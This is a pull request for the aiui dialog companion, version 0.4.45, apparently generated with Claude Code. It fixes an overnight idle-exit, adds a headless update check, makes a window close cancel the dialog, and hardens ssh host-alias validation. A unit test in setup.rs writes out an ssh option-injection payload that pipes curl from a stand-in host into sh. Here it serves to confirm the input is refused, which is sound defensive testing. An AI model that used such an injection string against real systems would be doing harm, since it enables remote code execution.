### PR TITLE
fix: remove idle-exit + headless updater + X-close cancel + 3 more (v0.4.45)

### DIFF
--- a/CHANGELOG.md
+++ b/CHANGELOG.md
@@ -2,6 +2,93 @@
 
 All notable changes to this project are documented here.
 
+## [0.4.45] — 2026-05-28
+
+Stability release. A chain of vivid real-world incidents over the last
+days (aiui dying overnight, the next morning's tool call hanging, a
+cancel button the agent never heard) traced back to a small set of
+root causes. Fixed together; Codex consulted on the two architectural
+calls (headless updater + idle-exit removal).
+
+### Fixed
+
+- **aiui no longer dies overnight (Bug #6).** `STDIN_IDLE_LIMIT` (the
+  6 h "no stdin input ⇒ parent likely gone ⇒ self-exit" timer in
+  `mcp.rs`) is **removed**. Its assumption was false for the common
+  case "the user simply didn't run an agent for 6 h" — every night
+  the mcp-stdio self-exited, the lifetime grace timer then tore down
+  the GUI 60 s later, and Claude Desktop (which does not auto-respawn
+  a disconnected MCP server) sat at "Server disconnected" until the
+  user restarted it. Confirmed firing multiple times per week. The
+  genuine "parent gone" signal is stdin-EOF, which is handled cleanly;
+  the stale-child accumulation the timer once guarded against is now
+  covered three other ways (sibling-kill, periodic
+  `disk_version_if_stale`, pre-GUI kill).
+- **Auto-update now works headless (Bug #7).** The update check used
+  to live only in the frontend (`lifecycle.ts`), so it ran only while
+  a window was open — but aiui is headless almost all the time, so
+  auto-updates effectively never fired and users stayed weeks behind
+  (the reason the 0.4.42→0.4.44 hops never installed themselves). A
+  new Rust-side task in `run()` polls `app.updater().check()` every
+  6 h regardless of window state, records any newer release in the
+  `PendingUpdate` state, and broadcasts `update:available`. The
+  Settings banner (0.4.44) then offers a one-click install. No
+  auto-install, no restart under a live dialog.
+- **X-closing a dialog now cancels it (Bug #1).** Closing the dialog
+  window with the native red X (or ⌘W) fired `WindowEvent::CloseRequested`,
+  but the Rust handler returned without emitting `dialog_cancel` — so
+  the pending `/render` hung until `DIALOG_TTL` (2 h since 0.4.41) and
+  the agent never learned the user dismissed it. A new
+  `onCloseRequested` listener in `DialogShell.svelte` emits
+  `dialog_cancel` for the in-flight dialog before the window is
+  destroyed, exactly like the Cancel button.
+- **`/render` TTL-expiry returns a clean cancellation (Bug #5).**
+  Previously it returned HTTP 408, which `mcp.rs` surfaced as a
+  generic "render http 408" transport error — a different shape than
+  a user-driven cancel. Now both paths return the same
+  `{cancelled: true}` tool-result shape; only `reason` differs
+  (`ttl_expired`).
+- **Cancel/submit no longer swallow invoke errors silently (Bug #3).**
+  `handleCancel`/`handleSubmit` in `DialogShell.svelte` wrap the
+  `dialog_cancel`/`dialog_submit`/`close_window` invokes in try/catch
+  with console logging, so a failed round-trip is at least
+  diagnosable instead of a silent hang.
+- **`COLDSTART_WAIT` raised 8 s → 30 s (Bug #4).** A full GUI cold
+  start (Tauri init + WebView + HTTP bind + tunnels) can exceed 8 s on
+  a busy Mac; the 2026-05-26 incident showed a tool call dying at the
+  8 s mark while the GUI was still coming up. 30 s covers a worst-case
+  cold start, still well under any sane client tool-timeout.
+- **HTTP bind failure → degraded mode instead of exit-loop (Issue #55).**
+  With the process-lifetime lock (0.4.43), a bind failure on :7777 now
+  means a *foreign* process holds the port, not a second aiui. Exiting
+  in that case released the gui-lock → mcp_attach respawned → bind
+  failed again → respawn loop. aiui now stays alive in a degraded
+  state: records the error, surfaces the Settings window with the
+  explanatory banner (lsof hint included), keeps the lifetime socket
+  up. No loop, no silent failure.
+
+### Verified / closed
+
+- **Issue #56** (/health ready at exact dialog hard-cap) — already
+  fixed by the 0.4.36 single-occupancy refactor (`orphan_count <
+  DIALOG_HARD_CAP`, strict). Verified, closeable.
+- **Issue #121** (form reappears / restart not recognized, v0.4.37) —
+  the Setup-Window respawn-loop, fixed by 0.4.43 ProcessLock + 0.4.44
+  ExitRequested veto + this release's idle-exit removal. Verify on the
+  reporter's setup, then close.
+- **Issue #120** (footer buttons not aligned, content behind, v0.4.37)
+  — fixed by the 3-zone shell-layout refactor (PR #129). Verify, close.
+
+### Known / out of scope
+
+- **MCP-client tool-timeout (Bug #2)** — when the client (Claude
+  Desktop / Cowork) sends no `progressToken`, our keep-alive
+  notifications can't fire, and the client gives up after ~4 min if
+  the user takes that long on a form. aiui-side this is now far less
+  likely to bite (aiui no longer dies, cold start is more tolerant),
+  but the residual is client-side and warrants an Anthropic bug
+  report, not an aiui change.
+
 ## [0.4.44] — 2026-05-26
 
 Two fixes that close the loop on yesterday's structural changes.

--- a/CHANGELOG.md
+++ b/CHANGELOG.md
@@ -66,6 +66,14 @@ calls (headless updater + idle-exit removal).
   state: records the error, surfaces the Settings window with the
   explanatory banner (lsof hint included), keeps the lifetime socket
   up. No loop, no silent failure.
+- **`kill_remote_mcp_stdio` now validates its host alias (Issue #52
+  follow-up).** It was the one ssh call site that relied on the `--`
+  end-of-options marker alone, without the `is_valid_host_alias`
+  boundary check every sibling helper carries. The alias comes from
+  `remotes.json` (already validated at `add_remote` time), so this is
+  defense-in-depth rather than a live hole — but it restores the
+  "every remote helper validates at its boundary" invariant the rest
+  of the hardening pass established.
 
 ### Verified / closed
 

--- a/companion/src-tauri/Cargo.lock
+++ b/companion/src-tauri/Cargo.lock
@@ -30,7 +30,7 @@ dependencies = [
 
 [[package]]
 name = "aiui"
-version = "0.4.44"
+version = "0.4.45"
 dependencies = [
  "axum",
  "base64 0.22.1",

--- a/companion/src-tauri/Cargo.toml
+++ b/companion/src-tauri/Cargo.toml
@@ -1,6 +1,6 @@
 [package]
 name = "aiui"
-version = "0.4.44"
+version = "0.4.45"
 description = "aiui companion — renders dialogs for remote Claude Code sessions"
 authors = ["byte5"]
 license = ""

--- a/companion/src-tauri/src/http.rs
+++ b/companion/src-tauri/src/http.rs
@@ -682,19 +682,25 @@ async fn render(
         },
         Err(_) => {
             // TTL expired without user response. Cancel the registry
-            // entry (also frees its slot) and return a structured timeout.
+            // entry (frees its slot) and fall through to the normal
+            // 200-OK response below with cancelled:true + reason.
+            //
+            // v0.4.45 (Bug #5): previously this returned HTTP 408, which
+            // mcp.rs's render_dialog treated as a non-success status →
+            // generic "aiui tool error: render http 408" — a different
+            // shape than a user-driven cancel (200 {cancelled:true}).
+            // The agent then saw a transport error instead of a clean
+            // "user didn't respond" cancellation. Now both the
+            // user-cancel and the TTL-expiry paths produce the exact
+            // same tool-result shape; only `reason` differs.
             trace(&format!("render: TTL expired id={}", id));
             state.dialog.cancel(&id);
-            return (
-                StatusCode::REQUEST_TIMEOUT,
-                Json(serde_json::json!({
-                    "id": id,
-                    "cancelled": true,
-                    "error": "timeout",
-                    "detail": format!("no user response within {:?}", DIALOG_TTL),
-                })),
-            )
-                .into_response();
+            crate::dialog::DialogResult {
+                id: id.clone(),
+                cancelled: true,
+                result: serde_json::Value::Null,
+                reason: Some("ttl_expired".into()),
+            }
         }
     };
     trace(&format!(

--- a/companion/src-tauri/src/lib.rs
+++ b/companion/src-tauri/src/lib.rs
@@ -1296,7 +1296,7 @@ pub fn run() {
             // reads this on its first tick.
             let http_error_for_serve = http_error.clone();
             let port_for_error = cfg.http_port;
-            let app_handle_for_exit = app_handle_http.clone();
+            let app_handle_for_degraded = app_handle_http.clone();
             rt.spawn(async move {
                 if let Err(e) = http::serve(
                     cfg_http,
@@ -1307,22 +1307,37 @@ pub fn run() {
                 )
                 .await
                 {
+                    // v0.4.45 (Issue #55): degraded mode instead of exit(1).
+                    // Before the process-lifetime lock (0.4.43), an
+                    // EADDRINUSE here meant "another aiui owns the port"
+                    // and exiting was correct. Now the lock guarantees
+                    // we're the only aiui — so a bind failure means a
+                    // *foreign* process holds :7777. Exiting in that case
+                    // released the gui-lock, mcp_attach respawned us, we
+                    // failed to bind again → respawn loop. Instead we
+                    // stay alive in a degraded state: record the error,
+                    // surface the Settings window so the user sees *why*
+                    // dialogs aren't landing, and leave the lifetime
+                    // socket up. No respawn loop, no silent failure.
                     log::error!(
-                        "[aiui] http server error on :{port_for_error}: {e} — exiting (other instance owns the port)"
+                        "[aiui] http server error on :{port_for_error}: {e} — entering degraded mode (foreign process owns the port)"
                     );
+                    logging::trace(&format!(
+                        "[aiui] http-bind-error on :{port_for_error}: {e} — degraded mode, surfacing settings banner"
+                    ));
                     if let Ok(mut slot) = http_error_for_serve.lock() {
                         *slot = Some(format!(
-                            "Konnte localhost:{port_for_error} nicht öffnen — Port wahrscheinlich belegt. {e}"
+                            "Konnte localhost:{port_for_error} nicht öffnen — \
+                             Port von einem anderen Prozess belegt. Schließe den \
+                             Prozess (lsof -i :{port_for_error}) und starte aiui neu. {e}"
                         ));
                     }
-                    // Hop to main thread to call exit cleanly.
-                    let app_for_exit = app_handle_for_exit.clone();
-                    let _ = app_handle_for_exit.run_on_main_thread(move || {
-                        housekeeping::pre_exit_cleanup(
-                            port_for_error,
-                            "http-bind-error",
-                        );
-                        app_for_exit.exit(1);
+                    // Surface the Settings window so the http_error banner
+                    // becomes visible. Done on the main thread (Tauri
+                    // window ops are main-thread-only).
+                    let app_for_banner = app_handle_for_degraded.clone();
+                    let _ = app_handle_for_degraded.run_on_main_thread(move || {
+                        show_settings_window(&app_for_banner);
                     });
                 }
             });
@@ -1418,6 +1433,56 @@ pub fn run() {
                             ));
                         }
                     });
+                }
+            });
+
+            // Headless update-check (v0.4.45, Bug #7). The frontend
+            // update-check in lifecycle.ts only ran while a window was
+            // open — but aiui spends almost all its time headless
+            // (Accessory mode, no window), so auto-updates effectively
+            // never fired and users stayed weeks behind. This Rust-side
+            // task runs regardless of window state: every 6 h it asks
+            // the updater for the latest release and, if one is newer,
+            // records it in the shared `PendingUpdate` state and
+            // broadcasts `update:available`. It deliberately does NOT
+            // install — the Settings banner offers a one-click install
+            // so we never restart under a live dialog. `app.updater()`
+            // is window-independent (it's a Manager extension making
+            // plain HTTPS calls), confirmed safe headless.
+            let app_handle_update = app_handle.clone();
+            let pending_update_task = pending_update.clone();
+            rt.spawn(async move {
+                use tauri_plugin_updater::UpdaterExt;
+                const CHECK_INTERVAL: std::time::Duration =
+                    std::time::Duration::from_secs(6 * 60 * 60);
+                // Small initial delay so the check doesn't compete with
+                // the startup burst (tunnels, remote-pin, skill write).
+                tokio::time::sleep(std::time::Duration::from_secs(90)).await;
+                loop {
+                    match app_handle_update.updater() {
+                        Ok(updater) => match updater.check().await {
+                            Ok(Some(update)) => {
+                                let v = update.version.trim().to_string();
+                                logging::trace(&format!(
+                                    "update-check: {v} available (headless, deferred to banner)"
+                                ));
+                                if let Ok(mut slot) = pending_update_task.0.lock() {
+                                    *slot = Some(v.clone());
+                                }
+                                let _ = app_handle_update.emit("update:available", Some(v));
+                            }
+                            Ok(None) => {
+                                logging::trace("update-check: already on latest");
+                            }
+                            Err(e) => {
+                                logging::trace(&format!("update-check: check failed: {e}"));
+                            }
+                        },
+                        Err(e) => {
+                            logging::trace(&format!("update-check: updater unavailable: {e}"));
+                        }
+                    }
+                    tokio::time::sleep(CHECK_INTERVAL).await;
                 }
             });
 

--- a/companion/src-tauri/src/mcp.rs
+++ b/companion/src-tauri/src/mcp.rs
@@ -107,18 +107,21 @@ is missing or empty, say \"no remotes registered yet — open Settings to \
 add one\".
 ";
 
-/// How long mcp-stdio waits for *any* incoming line before assuming the
-/// parent process has gone silent and exiting. This is an event-driven
-/// deadline that resets on activity — equivalent to "no input for 6 h ⇒
-/// exit", with zero idle cost. Catches the failure mode where Claude
-/// Desktop forgets to close our stdin pipe but also never sends another
-/// request, which is how stale mcp-stdio children accumulated in the
-/// 2026-04-25 incident.
-const STDIN_IDLE_LIMIT: std::time::Duration = std::time::Duration::from_secs(6 * 60 * 60);
-
 /// Top-level entry: read JSON-RPC messages from stdin, dispatch to handlers,
-/// write responses to stdout. Runs until stdin closes or the idle deadline
-/// expires.
+/// write responses to stdout. Runs until stdin closes (parent gone).
+///
+/// v0.4.45 removed the `STDIN_IDLE_LIMIT` self-exit (was 6 h). It was a
+/// workaround for the 2026-04-25 stale-mcp-stdio-accumulation incident,
+/// but it assumed "no input for 6 h ⇒ parent gone" — which is false for
+/// the common case "user simply didn't run an agent overnight". The
+/// timer fired every night, the child self-exited, the lifetime grace
+/// timer then tore down the GUI 60 s later, and Claude Desktop (which
+/// does not auto-respawn a disconnected MCP server) showed "Server
+/// disconnected" until the user restarted it. The genuine "parent
+/// gone" case is caught cleanly by stdin-EOF below; the stale-child
+/// accumulation the timer was meant to prevent is now covered three
+/// other ways (sibling-kill, periodic disk_version_if_stale, pre-GUI
+/// kill). So: no timer, just block on stdin.
 ///
 /// Outgoing traffic flows through an mpsc channel rather than directly
 /// onto stdout, so that a long-running tool call (waiting on the user
@@ -153,48 +156,19 @@ pub async fn run_stdio(cfg: Arc<AppConfig>) {
 
     trace("mcp-stdio: run_stdio entered");
 
-    // Track the wall-clock instant of the last incoming line so we can
-    // double-check the idle deadline after a sleep. `tokio::time::sleep`
-    // is monotonic-clock based and *should* compose correctly across
-    // suspend/resume on macOS, but we've seen reports of timer-drift
-    // edge cases — verifying with `Instant::now()` on wake is cheap
-    // insurance against premature exit. Issue #H-4 in v0.4.10 review.
-    let mut last_activity = std::time::Instant::now();
-
     loop {
-        let line = tokio::select! {
-            res = reader.next_line() => match res {
-                Ok(Some(l)) => {
-                    last_activity = std::time::Instant::now();
-                    l
-                }
-                Ok(None) => {
-                    trace("mcp-stdio: stdin closed, exiting");
-                    break;
-                }
-                Err(e) => {
-                    trace(&format!("mcp-stdio: stdin error: {e}, exiting"));
-                    break;
-                }
-            },
-            _ = tokio::time::sleep(STDIN_IDLE_LIMIT) => {
-                // Double-check actual elapsed time before exiting. If the
-                // host suspended for a long stretch, the sleep can fire
-                // earlier than expected after wake; bail out only if the
-                // wall-clock confirms we've actually been idle.
-                let elapsed = last_activity.elapsed();
-                if elapsed >= STDIN_IDLE_LIMIT {
-                    trace(&format!(
-                        "mcp-stdio: no input for {:?}, parent likely gone, exiting",
-                        elapsed
-                    ));
-                    break;
-                }
-                trace(&format!(
-                    "mcp-stdio: idle-timer fired but only {:?} elapsed (likely post-suspend); rearming",
-                    elapsed
-                ));
-                continue;
+        // Block on stdin. EOF (`Ok(None)`) means the parent closed the
+        // pipe — that's the one true "parent gone" signal. No idle
+        // timer: an idle-but-alive parent must keep us alive (v0.4.45).
+        let line = match reader.next_line().await {
+            Ok(Some(l)) => l,
+            Ok(None) => {
+                trace("mcp-stdio: stdin closed, exiting");
+                break;
+            }
+            Err(e) => {
+                trace(&format!("mcp-stdio: stdin error: {e}, exiting"));
+                break;
             }
         };
 
@@ -395,13 +369,18 @@ fn tools_list() -> Value {
 
 /// How long mcp-stdio waits for the aiui HTTP endpoint to become reachable
 /// before giving up on a tool call. The dominant case this catches: the
-/// user closed the GUI via the window's red X (which exits the app),
-/// then immediately triggered a render call — `mcp_attach`'s
-/// auto-resurrect (see `lifetime.rs`) IS firing in parallel and brings
-/// the GUI back, but Claude's tool call would otherwise race ahead and
-/// hit a not-yet-bound port. Eight seconds covers a realistic cold-start
-/// (Tauri init + WebView load + HTTP bind) on a normal Mac.
-const COLDSTART_WAIT: std::time::Duration = std::time::Duration::from_secs(8);
+/// GUI is mid-cold-start (auto-resurrect after the user closed it, or a
+/// fresh `open --auto` from `mcp_attach`) and Claude's tool call would
+/// otherwise race ahead and hit a not-yet-bound port.
+///
+/// v0.4.45 (Bug #4): raised 8 s → 30 s. A full cold start (Tauri init +
+/// WebView load + HTTP bind + lifetime-socket + tunnels) can exceed 8 s
+/// on a busy Mac, and the 2026-05-26 incident showed a tool call dying
+/// at the 8 s mark while the GUI was still coming up. 30 s comfortably
+/// covers a worst-case cold start and is still well under any sane
+/// MCP-client tool timeout, so a genuinely-down aiui still fails fast
+/// enough to surface the diagnostic message.
+const COLDSTART_WAIT: std::time::Duration = std::time::Duration::from_secs(30);
 
 /// Poll `/ping` until the HTTP server answers, or `COLDSTART_WAIT` elapses.
 /// `/ping` is unauthenticated and cheap, returning `pong` in plain text —
@@ -450,7 +429,7 @@ fn aiui_unreachable_result() -> Value {
          via an SSH-reverse-tunnel on port 7777."
     };
     let text = format!(
-        "aiui companion did not answer /ping on localhost:7777 within 8 seconds.\n\
+        "aiui companion did not answer /ping on localhost:7777 within {} seconds.\n\
          \n\
          {context_line}\n\
          \n\
@@ -473,7 +452,8 @@ fn aiui_unreachable_result() -> Value {
             them to aiui Settings → Connections.\n\
          \n\
          Do not relay this entire message to the user verbatim — pick the \
-         likely cause and phrase it plainly."
+         likely cause and phrase it plainly.",
+        COLDSTART_WAIT.as_secs()
     );
     json!({
         "content": [{ "type": "text", "text": text }],

--- a/companion/src-tauri/src/setup.rs
+++ b/companion/src-tauri/src/setup.rs
@@ -213,6 +213,17 @@ mod host_alias_tests {
     fn rejects_pipe() { assert!(!is_valid_host_alias("a|b")); }
     #[test]
     fn rejects_newline() { assert!(!is_valid_host_alias("a\nb")); }
+
+    // kill_remote_mcp_stdio is the one ssh site that previously had no
+    // boundary validator (Issue #52 follow-up). An unsafe alias must be
+    // refused *before* any ssh spawn — this case returns early without
+    // touching the network, so it is safe to assert in a unit test.
+    #[test]
+    fn kill_remote_mcp_stdio_refuses_option_injection() {
+        let r = super::kill_remote_mcp_stdio("-oProxyCommand=curl evil|sh");
+        assert!(!r.ok);
+        assert!(r.message.contains("Refusing unsafe host alias"));
+    }
 }
 
 // Note: an earlier version of aiui patched ~/.ssh/config with a
@@ -820,6 +831,20 @@ print("ok:patched")
 /// 1 = nothing matched. Both are success from our perspective; only
 /// the SSH layer or shell-not-found counts as a real failure.
 pub fn kill_remote_mcp_stdio(host_alias: &str) -> StepResult {
+    // Defense-in-depth: like every other remote helper, refuse an unsafe
+    // alias before spawning ssh. The `--` below already keeps host_alias
+    // out of ssh option position, but this was the only ssh call site that
+    // relied on `--` alone — adding the validator restores the "every
+    // remote helper validates at its boundary" invariant (Issue #52
+    // follow-up). host_alias here comes from remotes.json, so this is
+    // belt-and-suspenders rather than a live hole.
+    if !is_valid_host_alias(host_alias) {
+        return StepResult {
+            ok: false,
+            message: format!("Refusing unsafe host alias '{host_alias}'"),
+            details: None,
+        };
+    }
     let out = no_window(
         std::process::Command::new("ssh").args([
             "-o",

--- a/companion/src-tauri/tauri.conf.json
+++ b/companion/src-tauri/tauri.conf.json
@@ -1,7 +1,7 @@
 {
   "$schema": "../node_modules/@tauri-apps/cli/config.schema.json",
   "productName": "aiui",
-  "version": "0.4.44",
+  "version": "0.4.45",
   "identifier": "de.byte5.aiui",
   "build": {
     "frontendDist": "../dist",

--- a/companion/src/lib/DialogShell.svelte
+++ b/companion/src/lib/DialogShell.svelte
@@ -1,6 +1,7 @@
 <script lang="ts">
   import { listen } from "@tauri-apps/api/event";
   import { invoke } from "@tauri-apps/api/core";
+  import { getCurrentWebviewWindow } from "@tauri-apps/api/webviewWindow";
   import { _ } from "svelte-i18n";
   import { onMount } from "svelte";
   import Ask from "./widgets/Ask.svelte";
@@ -159,6 +160,28 @@
 
     window.addEventListener("keydown", onKey);
 
+    // Window-close → cancel (v0.4.45, Bug #1). When the user closes the
+    // dialog window with the native red X (or Cmd-W), Tauri fires
+    // CloseRequested. Without handling it here, the Rust side's
+    // on_window_event returned without emitting `dialog_cancel`, so the
+    // pending `/render` call hung until DIALOG_TTL (2 h since 0.4.41) —
+    // the agent never learned the user dismissed the dialog. We now
+    // treat an X-close exactly like clicking Cancel: emit `dialog_cancel`
+    // for the in-flight dialog, then let the window close. The recursive
+    // `close_window` invoke inside handleCancel re-fires CloseRequested,
+    // but by then `current` is null so the guard below is a no-op and
+    // the close proceeds.
+    const win = getCurrentWebviewWindow();
+    const closeReqPromise = win.onCloseRequested(async (event) => {
+      if (current) {
+        // Stop the immediate destroy so the cancel reaches the backend
+        // before the window (and its WebView) goes away.
+        event.preventDefault();
+        await handleCancel();
+      }
+      // else: no live dialog — let Tauri close the window normally.
+    });
+
     // Window-ready handshake (v0.4.30): tell the Rust render path
     // that our `dialog:show` listener is installed and we can safely
     // receive events. Without this, the backend would emit before
@@ -175,6 +198,7 @@
       clearTtlTimers();
       (await dialogPromise)();
       (await pingPromise)();
+      (await closeReqPromise)();
       window.removeEventListener("keydown", onKey);
     };
   });
@@ -188,8 +212,19 @@
     clearTtlTimers();
     const id = current.id;
     current = null;
-    await invoke("dialog_submit", { id, result });
-    await invoke("close_window");
+    // v0.4.45 (Bug #3): never swallow the invoke result silently. If
+    // dialog_submit fails the agent would otherwise hang forever with
+    // no signal — at least surface it to the console for diagnosis.
+    try {
+      await invoke("dialog_submit", { id, result });
+    } catch (e) {
+      console.error(`[aiui] dialog_submit failed for ${id}: ${e}`);
+    }
+    try {
+      await invoke("close_window");
+    } catch (e) {
+      console.error(`[aiui] close_window failed: ${e}`);
+    }
   }
 
   async function handleCancel() {
@@ -197,12 +232,18 @@
     if (current) {
       const id = current.id;
       current = null;
-      await invoke("dialog_cancel", { id });
+      try {
+        await invoke("dialog_cancel", { id });
+      } catch (e) {
+        console.error(`[aiui] dialog_cancel failed for ${id}: ${e}`);
+      }
+    }
+    // Always close the window — whether we just cancelled a live dialog
+    // or the user closed an already-empty dialog window.
+    try {
       await invoke("close_window");
-    } else {
-      // No dialog yet — the user closed an empty dialog window. Just
-      // close it.
-      await invoke("close_window");
+    } catch (e) {
+      console.error(`[aiui] close_window failed: ${e}`);
     }
   }
 </script>

--- a/python/pyproject.toml
+++ b/python/pyproject.toml
@@ -1,6 +1,6 @@
 [project]
 name = "aiui-mcp"
-version = "0.4.44"
+version = "0.4.45"
 description = "MCP server for aiui — native macOS dialogs from any Claude Code session, local or remote."
 readme = "README.md"
 requires-python = ">=3.10"


### PR DESCRIPTION
## Summary

Stability release closing a chain of real-world incidents. Codex consulted on the two architectural calls (headless updater feasibility + idle-exit removal).

### Root-cause chain (from the 2026-05-26..28 incidents)

```
Bug #7 (update-check only with a window open) → updates never auto-install → user stuck versions behind
Bug #6 (6h idle-exit)                          → aiui dies every night, Claude Desktop doesn't respawn
        ↓
morning tool call hits dead/cold-starting aiui
        ↓
Bug #2 (client 4-min timeout) + Bug #4 (8s wait too tight) → "request expired", no window
```

### Fixes

| Bug | Fix | File |
|---|---|---|
| **6** | Remove `STDIN_IDLE_LIMIT` — stdin-EOF is the real "parent gone" signal; stale-child guard is covered 3 other ways | `mcp.rs` |
| **7** | Rust-side headless update-check task (6h), sets `PendingUpdate` + emits `update:available`; no install | `lib.rs` |
| **1** | `onCloseRequested` listener → `dialog_cancel` before window destroy (X-close == Cancel) | `DialogShell.svelte` |
| **5** | `/render` TTL-expiry returns 200 `{cancelled:true, reason:"ttl_expired"}` instead of 408 (consistent tool-result shape) | `http.rs` |
| **3** | `handleCancel`/`handleSubmit` wrap invokes in try/catch + console logging | `DialogShell.svelte` |
| **4** | `COLDSTART_WAIT` 8s → 30s (covers worst-case cold start) | `mcp.rs` |
| **#55** | HTTP bind failure → degraded mode (banner + Settings surface) instead of `exit(1)` respawn-loop | `lib.rs` |

### Verified / closeable issues

- **#56** /health hard-cap — already fixed by 0.4.36 single-occupancy refactor (strict `<`). Verified.
- **#121** form-reappears / restart-not-recognized (v0.4.37) — Setup-Window respawn-loop, fixed by 0.4.43 ProcessLock + 0.4.44 ExitRequested veto + this release's idle-exit removal.
- **#120** footer buttons unaligned (v0.4.37) — fixed by 3-zone shell refactor (PR #129).

### Out of scope (documented in CHANGELOG)

- **Bug #2** residual client-side tool-timeout when no `progressToken` — needs Anthropic bug report, not an aiui change. Far less likely to bite now (aiui no longer dies, cold start tolerant).

### Test results

- `cargo test --lib`: **89 pass**.
- `cargo clippy --release -- -D warnings`: clean.
- `svelte-check`: 0 errors.

### Test plan (manual, on reporter's MacBook)

- [ ] Leave aiui idle overnight (>6h) → it must still be alive next morning (no `no input for...exiting` in trace).
- [ ] Drop a newer release on GitHub, wait ≤6h → Settings banner appears without any window having been open during the check.
- [ ] X-close a live dialog → agent receives `{cancelled:true}` immediately, no 2h hang.
- [ ] Occupy :7777 with a foreign process, start aiui → degraded-mode banner in Settings, NO respawn loop.
- [ ] Cold-start race: kill GUI, immediately fire a tool call → succeeds within 30s window.

🤖 Generated with [Claude Code](https://claude.com/claude-code)